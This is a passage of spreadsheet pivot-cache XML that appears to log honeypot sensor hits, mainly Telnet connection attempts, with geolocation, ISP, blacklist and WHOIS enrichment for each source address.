    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Ernakulam"/>
    <s v="Piravam"/>
    <s v="1259541"/>
    <s v="NA"/>
    <s v="9.86667"/>
    <s v="76.5"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:b7e8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2372"/>
    <x v="2372"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T04:34:22"/>
    <d v="2025-04-10T04:34:22"/>
    <d v="2025-04-10T04:34:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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7:563"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2373"/>
    <x v="2373"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T04:11:19"/>
    <d v="2025-04-10T04:11:19"/>
    <d v="2025-04-10T04:11:19"/>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3d03:72f6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2374"/>
    <x v="2374"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T04:09:27"/>
    <d v="2025-03-31T03:21:41"/>
    <d v="2025-04-10T04:09:27"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Dongjak-gu"/>
    <s v="Sindaebang-dong"/>
    <s v="8692590"/>
    <s v="156-010"/>
    <s v="37.4927"/>
    <s v="126.917"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7624:88bf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2375"/>
    <x v="2375"/>
    <s v="host-87-19-131-249.retail.telecomitalia.it"/>
    <x v="0"/>
    <d v="2025-04-10T04:05:16"/>
    <d v="2025-04-10T04:05:16"/>
    <d v="2025-04-10T04:05:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_PJL_HC1"/>
    <s v="9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="62"/>
    <s v="Lazio"/>
    <s v="Rome"/>
    <s v="Rome"/>
    <s v="3169070"/>
    <s v="00187"/>
    <s v="41.9618"/>
    <s v="12.4643"/>
    <s v="3269"/>
    <s v="ASN-IBSNAZ"/>
    <s v="Telecom Italia S.p.A. TIN EASY LITE"/>
    <s v="consumer"/>
    <s v="Interbusiness"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-01-29 00:00:00"/>
    <s v="2026-01-29 00:00:00"/>
    <s v="2025-02-14 00:53:45"/>
    <s v="ns.telecomitalia.it_x000a_  dnsts.interbusiness.it"/>
    <s v="Telecom Italia s.p.a."/>
    <s v="ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5713:83f9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2376"/>
    <x v="2376"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T03:50:14"/>
    <d v="2025-04-10T03:50:14"/>
    <d v="2025-04-10T03:50:14"/>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3:1957"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2377"/>
    <x v="2377"/>
    <s v="NA&amp;&amp;93-39-109-35.ip75.fastwebnet.it"/>
    <x v="0"/>
    <d v="2025-04-10T03:30:20"/>
    <d v="2025-04-10T03:08:02"/>
    <d v="2025-04-10T03:30:20"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="20121"/>
    <s v="45.4642"/>
    <s v="9.18998"/>
    <s v="12874"/>
    <s v="Fastweb SpA"/>
    <s v="Fastweb SpA"/>
    <s v="business"/>
    <s v="Fastweb Comune DI Pomigliano D Arco"/>
    <s v="2008-02-25"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-01-25 00:00:00"/>
    <s v="2026-02-28 00:00:00"/>
    <s v="2025-03-16 00:52:33"/>
    <s v="dns3.fastweb.it_x000a_  dns4.fastweb.it"/>
    <s v="Fastweb s.p.a."/>
    <s v="ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5d27:6d23"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2378"/>
    <x v="2378"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T03:27:20"/>
    <d v="2025-04-09T22:48:18"/>
    <d v="2025-04-10T03:27:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="16"/>
    <s v="Plovdiv"/>
    <s v="Plovdiv"/>
    <s v="Plovdiv"/>
    <s v="728193"/>
    <s v="4000"/>
    <s v="42.15"/>
    <s v="24.75"/>
    <s v="13124"/>
    <s v="A1 Bulgaria EAD"/>
    <s v="A1 Bulgaria EAD"/>
    <s v="business"/>
    <s v="NEW-DOCSIS"/>
    <s v="2011-10-26"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:82cc:d565"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2379"/>
    <x v="2379"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T03:13:38"/>
    <d v="2025-04-09T20:06:42"/>
    <d v="2025-04-10T03:13:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="business"/>
    <s v="BB Multiplay"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:ee60"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2380"/>
    <x v="2380"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T02:51:04"/>
    <d v="2025-04-10T02:51:04"/>
    <d v="2025-04-10T02:51:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:7105"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2381"/>
    <x v="2381"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T02:48:38"/>
    <d v="2025-04-10T02:48:38"/>
    <d v="2025-04-10T02:48:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b06:f1d1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2382"/>
    <x v="2382"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T02:44:23"/>
    <d v="2025-02-16T17:02:06"/>
    <d v="2025-04-10T02:44:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IL"/>
    <s v="Illinois"/>
    <s v="Cook"/>
    <s v="Chicago (Near South Side)"/>
    <s v="4887398"/>
    <s v="60616"/>
    <s v="41.8528"/>
    <s v="-87.6232"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="2008-02-21"/>
    <s v="CABLE-1"/>
    <s v="2021-01-25"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6054:6bb5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2383"/>
    <x v="2383"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T02:26:16"/>
    <d v="2025-04-10T02:26:16"/>
    <d v="2025-04-10T02:26:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="EG"/>
    <s v="Egypt"/>
    <s v="GZ"/>
    <s v="Giza"/>
    <s v="Maadi"/>
    <s v="Abū an Numrus"/>
    <s v="362865"/>
    <s v="NA"/>
    <s v="29.9632"/>
    <s v="31.2493"/>
    <s v="24863"/>
    <s v="LINKdotNET-AS"/>
    <s v="Link Egypt (Link.NET)"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c5a3:e7dc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2384"/>
    <x v="2384"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T02:16:05"/>
    <d v="2025-04-09T17:47:42"/>
    <d v="2025-04-10T02:16:05"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:733d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2385"/>
    <x v="2385"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T02:07:41"/>
    <d v="2025-04-10T02:07:41"/>
    <d v="2025-04-10T02:07:41"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:3352"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2386"/>
    <x v="2386"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T02:03:57"/>
    <d v="2025-04-09T22:35:38"/>
    <d v="2025-04-10T02:03:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MT"/>
    <s v="Mato Grosso"/>
    <s v="Campos de Júlio"/>
    <s v="Campos de Júlio"/>
    <s v="12978169"/>
    <s v="NA"/>
    <s v="-13.7245"/>
    <s v="-59.2603"/>
    <s v="4230"/>
    <s v="CLARO S.A."/>
    <s v="Claro S.A."/>
    <s v="business"/>
    <s v="Claro S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bf3b:5754"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2387"/>
    <x v="2387"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T01:04:51"/>
    <d v="2025-04-10T01:04:51"/>
    <d v="2025-04-10T01:04:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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d9:5545"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2388"/>
    <x v="2388"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T01:04:16"/>
    <d v="2023-11-25T00:19:06"/>
    <d v="2025-04-10T01:04:16"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="3057&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Dallas"/>
    <s v="Balch Springs"/>
    <s v="4672059"/>
    <s v="NA"/>
    <s v="32.7287"/>
    <s v="-96.6228"/>
    <s v="7018"/>
    <s v="AT&amp;T Enterprises, LLC"/>
    <s v="AT&amp;T Enterprises, LLC"/>
    <s v="business"/>
    <s v="ONE RING NETWORKS INC-ORN"/>
    <s v="1983-08-23"/>
    <s v="ATT"/>
    <s v="2025-03-18"/>
    <s v="None&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca9:6b4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2389"/>
    <x v="2389"/>
    <s v="node-kxv.pool-101-109.dynamic.totinternet.net"/>
    <x v="0"/>
    <d v="2025-04-10T00:44:19"/>
    <d v="2025-04-10T00:44:19"/>
    <d v="2025-04-10T00:44:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="23"/>
    <s v="Trat"/>
    <s v="Laem Ngop"/>
    <s v="Laem Ngop"/>
    <s v="1609283"/>
    <s v="NA"/>
    <s v="12.1717"/>
    <s v="102.395"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2019-05-14 09:00:25"/>
    <s v="2026-05-14 09:00:25"/>
    <s v="2023-05-18 14:44:23"/>
    <s v="['CORA.NS.CLOUDFLARE.COM', 'PHIL.NS.CLOUDFLARE.COM']"/>
    <s v="GMO Internet, Inc."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:656d:6a03"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2390"/>
    <x v="2390"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T00:43:03"/>
    <d v="2025-04-10T00:43:03"/>
    <d v="2025-04-10T00:43:03"/>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f:a1b0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2391"/>
    <x v="2391"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T00:23:00"/>
    <d v="2025-04-08T02:46:25"/>
    <d v="2025-04-10T00:23:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="BA"/>
    <s v="Bahia"/>
    <s v="Salvador"/>
    <s v="Salvador"/>
    <s v="3450554"/>
    <s v="NA"/>
    <s v="-12.9756"/>
    <s v="-38.491"/>
    <s v="269025"/>
    <s v="GmaX Telecomunicaçao"/>
    <s v="GmaX Telecomunicaçao"/>
    <s v="business"/>
    <s v="GmaX Telecomunicaçao"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2db2:8260"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2392"/>
    <x v="2392"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T00:20:44"/>
    <d v="2025-04-10T00:20:44"/>
    <d v="2025-04-10T00:20:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
